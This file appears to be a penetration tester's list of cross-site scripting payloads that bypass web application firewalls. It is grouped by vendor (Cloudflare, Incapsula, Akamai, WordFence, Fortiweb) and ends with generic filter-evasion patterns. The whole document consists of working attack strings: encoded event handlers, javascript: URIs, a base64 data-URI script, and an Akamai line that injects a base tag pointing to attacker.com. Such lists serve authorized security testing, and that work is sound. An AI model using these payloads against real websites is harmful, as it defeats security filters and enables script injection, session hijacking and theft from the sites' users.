# XSS WAF Bypass — vendor-specific (PayloadsAllTheThings + community)
# Test after generic polyglots fail

# Cloudflare
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
<svg/OnLoad="`${prompt``}`">
<svg/onload=%26nbsp;alert`x`+
1'"><img/src/onerror=.1|alert``>
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
<a href="j&Tab;a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>

# Incapsula
<svg onload\r\n=$.globalEval("al"+"ert()");>
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>

# Akamai
?"></script><base%20c%3D=href%3Dhttps:\attacker.com>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

# WordFence
<a href=javascript:alert(1)>

# Fortiweb
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e

# Generic filter bypass patterns
<ScRiPt>alert(1)</ScRiPt>
<script>alert&lpar;1&rpar;</script>
<img src=x oneerror=alert(1)>
<img src=x onerror="alert`1`">
<svg/onload=alert(1)//
<svg/onload=alert(1)>
<svg/onload=alert(1)%0a>
<svg/onload=alert(1)%09>
<svg/onload=alert(1)%0d>
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:alert(1)>
<img src=x:alert(alt) onerror=eval(alt) alt=alert(1)>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
